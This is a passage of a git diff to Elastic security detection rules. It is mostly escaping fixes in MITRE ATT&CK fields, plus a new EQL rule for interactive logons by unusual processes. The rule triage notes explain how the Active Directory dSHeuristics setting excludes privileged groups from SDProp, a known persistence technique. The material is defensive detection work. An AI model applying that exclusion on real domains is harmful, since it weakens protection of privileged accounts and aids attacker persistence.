a/packages/security_detection_engine/kibana/security_rule/60884af6-f553-4a6c-af13-300047455491_102.json +++ b/packages/security_detection_engine/kibana/security_rule/60884af6-f553-4a6c-af13-300047455491_102.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/60b6b72f-0fbc-47e7-9895-9ba7627a8b50_104.json b/packages/security_detection_engine/kibana/security_rule/60b6b72f-0fbc-47e7-9895-9ba7627a8b50_104.json index a638ce812fc..95e5275fdee 100644 --- a/packages/security_detection_engine/kibana/security_rule/60b6b72f-0fbc-47e7-9895-9ba7627a8b50_104.json +++ b/packages/security_detection_engine/kibana/security_rule/60b6b72f-0fbc-47e7-9895-9ba7627a8b50_104.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/60b6b72f-0fbc-47e7-9895-9ba7627a8b50_105.json b/packages/security_detection_engine/kibana/security_rule/60b6b72f-0fbc-47e7-9895-9ba7627a8b50_105.json index 0857b4ada56..e1bfb0af51e 100644 --- a/packages/security_detection_engine/kibana/security_rule/60b6b72f-0fbc-47e7-9895-9ba7627a8b50_105.json +++ b/packages/security_detection_engine/kibana/security_rule/60b6b72f-0fbc-47e7-9895-9ba7627a8b50_105.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/60f3adec-1df9-4104-9c75-b97d9f078b25_101.json b/packages/security_detection_engine/kibana/security_rule/60f3adec-1df9-4104-9c75-b97d9f078b25_101.json index d22f386e8ae..b0249030792 100644 --- a/packages/security_detection_engine/kibana/security_rule/60f3adec-1df9-4104-9c75-b97d9f078b25_101.json +++ b/packages/security_detection_engine/kibana/security_rule/60f3adec-1df9-4104-9c75-b97d9f078b25_101.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/60f3adec-1df9-4104-9c75-b97d9f078b25_102.json b/packages/security_detection_engine/kibana/security_rule/60f3adec-1df9-4104-9c75-b97d9f078b25_102.json index 2a2bb8082a8..a9fe89ba23d 100644 --- a/packages/security_detection_engine/kibana/security_rule/60f3adec-1df9-4104-9c75-b97d9f078b25_102.json +++ b/packages/security_detection_engine/kibana/security_rule/60f3adec-1df9-4104-9c75-b97d9f078b25_102.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/610949a1-312f-4e04-bb55-3a79b8c95267_104.json b/packages/security_detection_engine/kibana/security_rule/610949a1-312f-4e04-bb55-3a79b8c95267_104.json index 1a4ce1798a1..81f4a49b05e 100644 --- a/packages/security_detection_engine/kibana/security_rule/610949a1-312f-4e04-bb55-3a79b8c95267_104.json +++ b/packages/security_detection_engine/kibana/security_rule/610949a1-312f-4e04-bb55-3a79b8c95267_104.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/610949a1-312f-4e04-bb55-3a79b8c95267_105.json b/packages/security_detection_engine/kibana/security_rule/610949a1-312f-4e04-bb55-3a79b8c95267_105.json index 284a9f44cb5..22eee240245 100644 --- a/packages/security_detection_engine/kibana/security_rule/610949a1-312f-4e04-bb55-3a79b8c95267_105.json +++ b/packages/security_detection_engine/kibana/security_rule/610949a1-312f-4e04-bb55-3a79b8c95267_105.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/610949a1-312f-4e04-bb55-3a79b8c95267_106.json b/packages/security_detection_engine/kibana/security_rule/610949a1-312f-4e04-bb55-3a79b8c95267_106.json index a888b528d2a..d2cbe49b6d4 100644 --- a/packages/security_detection_engine/kibana/security_rule/610949a1-312f-4e04-bb55-3a79b8c95267_106.json +++ b/packages/security_detection_engine/kibana/security_rule/610949a1-312f-4e04-bb55-3a79b8c95267_106.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/61766ef9-48a5-4247-ad74-3349de7eb2ad_1.json b/packages/security_detection_engine/kibana/security_rule/61766ef9-48a5-4247-ad74-3349de7eb2ad_1.json new file mode 100644 index 00000000000..ce9afd56280 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/61766ef9-48a5-4247-ad74-3349de7eb2ad_1.json @@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies interactive logon attempt with alternate credentials and by an unusual process. Adversaries may create a new token to escalate privileges and bypass access controls.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Interactive Logon by an Unusual Process", + "query": "authentication where \n host.os.type : \"windows\" and winlog.event_data.LogonProcessName : \"Advapi*\" and \n winlog.logon.type == \"Interactive\" and winlog.event_data.SubjectUserSid : (\"S-1-5-21*\", \"S-1-12-*\") and \n winlog.event_data.TargetUserSid : (\"S-1-5-21*\", \"S-1-12-*\") and \n not startswith~(winlog.event_data.SubjectUserSid, winlog.event_data.TargetUserSid) and \n not process.executable : \n (\"?:\\\\Windows\\\\System32\\\\winlogon.exe\", \n \"?:\\\\Windows\\\\System32\\\\wininit.exe\", \n \"?:\\\\Program Files\\\\Okta\\\\Okta Verify\\\\OktaVerify.exe\", \n \"?:\\\\Program Files (x86)\\\\Okta\\\\Okta Verify\\\\OktaVerify.exe\")\n", + "references": [ + "https://attack.mitre.org/techniques/T1134/002/" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.LogonProcessName", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserSid", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetUserSid", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.logon.type", + "type": "unknown" + } + ], + "risk_score": 73, + "rule_id": "61766ef9-48a5-4247-ad74-3349de7eb2ad", + "setup": "\nAudit event 4624 is needed to trigger this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1134", + "name": "Access Token Manipulation", + "reference": "https://attack.mitre.org/techniques/T1134/", + "subtechnique": [ + { + "id": "T1134.002", + "name": "Create Process with Token", + "reference": "https://attack.mitre.org/techniques/T1134/002/" + }, + { + "id": "T1134.003", + "name": "Make and Impersonate Token", + "reference": "https://attack.mitre.org/techniques/T1134/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "61766ef9-48a5-4247-ad74-3349de7eb2ad_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_106.json b/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_106.json index 5a5288dba2b..d4f5b14f448 100644 --- a/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_106.json +++ b/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_106.json @@ -51,7 +51,7 @@ ], "risk_score": 47, "rule_id": "61ac3638-40a3-44b2-855a-985636ca985e", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -108,7 +108,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_107.json b/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_107.json index d822ac6afd5..9c8e3a85aaa 100644 --- a/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_107.json +++ b/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_107.json @@ -56,7 +56,7 @@ ], "risk_score": 47, "rule_id": "61ac3638-40a3-44b2-855a-985636ca985e", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -113,7 +113,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_108.json b/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_108.json index 96295fb71ac..6ea40021517 100644 --- a/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_108.json +++ b/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_108.json @@ -56,7 +56,7 @@ ], "risk_score": 47, "rule_id": "61ac3638-40a3-44b2-855a-985636ca985e", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -112,7 +112,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_109.json b/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_109.json index 2e94f0ae923..5513d20181f 100644 --- a/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_109.json +++ b/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_109.json @@ -51,7 +51,7 @@ ], "risk_score": 47, "rule_id": "61ac3638-40a3-44b2-855a-985636ca985e", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -107,7 +107,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_110.json b/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_110.json index 1d5974851a8..b303cd65cab 100644 --- a/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_110.json +++ b/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_110.json @@ -51,7 +51,7 @@ ], "risk_score": 47, "rule_id": "61ac3638-40a3-44b2-855a-985636ca985e", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -109,7 +109,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -136,7 +136,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_111.json b/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_111.json index 8028627177a..87dea22718c 100644 --- a/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_111.json +++ b/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_111.json @@ -51,7 +51,7 @@ ], "risk_score": 47, "rule_id": "61ac3638-40a3-44b2-855a-985636ca985e", - "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -109,7 +109,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -136,7 +136,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_105.json b/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_105.json index 5cd09ad32c9..fac7276d2da 100644 --- a/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_105.json +++ b/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_105.json @@ -14,7 +14,7 @@ "license": "Elastic License v2", "name": "AdminSDHolder SDProp Exclusion Added", "note": "## Triage and analysis\n\n### Investigating AdminSDHolder SDProp Exclusion Added\n\nThe SDProp process compares the permissions on protected objects with those defined on the AdminSDHolder object. If the permissions on any of the protected accounts and groups do not match, it resets the permissions on the protected accounts and groups to match those defined in the domain AdminSDHolder object.\n\nThe dSHeuristics is a Unicode string attribute, in which each character in the string represents a heuristic that is used to determine the behavior of Active Directory.\n\nAdministrators can use the dSHeuristics attribute to exclude privilege groups from the SDProp process by setting the 16th bit (dwAdminSDExMask) of the string to a certain value, which represents the group(s):\n\n- For example, to exclude the Account Operators group, an administrator would modify the string, so the 16th character is set to 1 (i.e., 0000000001000001).\n\nThe usage of this exclusion can leave the accounts unprotected and facilitate the misconfiguration of privileges for the excluded groups, enabling attackers to add accounts to these groups to maintain long-term persistence with high privileges.\n\nThis rule matches changes of the dsHeuristics object where the 16th bit is set to a value other than zero.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the value assigned to the 16th bit of the string on the `winlog.event_data.AttributeValue` field:\n - Account Operators eq 1\n - Server Operators eq 2\n - Print Operators eq 4\n - Backup Operators eq 8\n The field value can range from 0 to f (15). If more than one group is specified, the values will be summed together; for example, Backup Operators and Print Operators will set the `c` value on the bit.\n\n### False positive analysis\n\n- While this modification can be done legitimately, it is not a best practice. Any potential benign true positive (B-TP) should be mapped and reviewed by the security team for alternatives as this weakens the security of the privileged group.\n\n### Response and remediation\n\n- The change can be reverted by setting the dwAdminSDExMask (16th bit) to 0 in dSHeuristics.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "any where host.os.type == \"windows\" and event.action == \"Directory Service Changes\" and\n event.code == \"5136\" and\n winlog.event_data.AttributeLDAPDisplayName : \"dSHeuristics\" and\n length(winlog.event_data.AttributeValue) \u003e 15 and\n winlog.event_data.AttributeValue regex~ \"[0-9]{15}([1-9a-f]).*\"\n", + "query": "any where host.os.type == \"windows\" and event.action == \"Directory Service Changes\" and\n event.code == \"5136\" and\n winlog.event_data.AttributeLDAPDisplayName : \"dSHeuristics\" and\n length(winlog.event_data.AttributeValue) > 15 and\n winlog.event_data.AttributeValue regex~ \"[0-9]{15}([1-9a-f]).*\"\n", "references": [ "https://www.cert.ssi.gouv.fr/uploads/guide-ad.html#dsheuristics_bad", "https://petri.com/active-directory-security-understanding-adminsdholder-object" @@ -58,7 +58,7 @@ ], "risk_score": 73, "rule_id": "61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7", - "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_106.json b/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_106.json index 704ddf40f87..25bfe5bcd1e 100644 --- a/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_106.json +++ b/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_106.json @@ -14,7 +14,7 @@ "license": "Elastic License v2", "name": "AdminSDHolder SDProp Exclusion Added", "note": "## Triage and analysis\n\n### Investigating AdminSDHolder SDProp Exclusion Added\n\nThe SDProp process compares the permissions on protected objects with those defined on the AdminSDHolder object. If the permissions on any of the protected accounts and groups do not match, it resets the permissions on the protected accounts and groups to match those defined in the domain AdminSDHolder object.\n\nThe dSHeuristics is a Unicode string attribute, in which each character in the string represents a heuristic that is used to determine the behavior of Active Directory.\n\nAdministrators can use the dSHeuristics attribute to exclude privilege groups from the SDProp process by setting the 16th bit (dwAdminSDExMask) of the string to a certain value, which represents the group(s):\n\n- For example, to exclude the Account Operators group, an administrator would modify the string, so the 16th character is set to 1 (i.e., 0000000001000001).\n\nThe usage of this exclusion can leave the accounts unprotected and facilitate the misconfiguration of privileges for the excluded groups, enabling attackers to add accounts to these groups to maintain long-term persistence with high privileges.\n\nThis rule matches changes of the dsHeuristics object where the 16th bit is set to a value other than zero.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the value assigned to the 16th bit of the string on the `winlog.event_data.AttributeValue` field:\n - Account Operators eq 1\n - Server Operators eq 2\n - Print Operators eq 4\n - Backup Operators eq 8\n The field value can range from 0 to f (15). If more than one group is specified, the values will be summed together; for example, Backup Operators and Print Operators will set the `c` value on the bit.\n\n### False positive analysis\n\n- While this modification can be done legitimately, it is not a best practice. Any potential benign true positive (B-TP) should be mapped and reviewed by the security team for alternatives as this weakens the security of the privileged group.\n\n### Response and remediation\n\n- The change can be reverted by setting the dwAdminSDExMask (16th bit) to 0 in dSHeuristics.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "any where event.action == \"Directory Service Changes\" and\n event.code == \"5136\" and\n winlog.event_data.AttributeLDAPDisplayName : \"dSHeuristics\" and\n length(winlog.event_data.AttributeValue) \u003e 15 and\n winlog.event_data.AttributeValue regex~ \"[0-9]{15}([1-9a-f]).*\"\n", + "query": "any where event.action == \"Directory Service Changes\" and\n event.code == \"5136\" and\n winlog.event_data.AttributeLDAPDisplayName : \"dSHeuristics\" and\n length(winlog.event_data.AttributeValue) > 15 and\n winlog.event_data.AttributeValue regex~ \"[0-9]{15}([1-9a-f]).*\"\n", "references": [ "https://www.cert.ssi.gouv.fr/uploads/guide-ad.html#dsheuristics_bad", "https://petri.com/active-directory-security-understanding-adminsdholder-object" @@ -53,7 +53,7 @@ ], "risk_score": 73, "rule_id": "61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7", - "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_107.json b/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_107.json index 2dce6339d22..852b67fb42a 100644 --- a/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_107.json +++ b/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_107.json @@ -14,7 +14,7 @@ "license": "Elastic License v2", "name": "AdminSDHolder SDProp 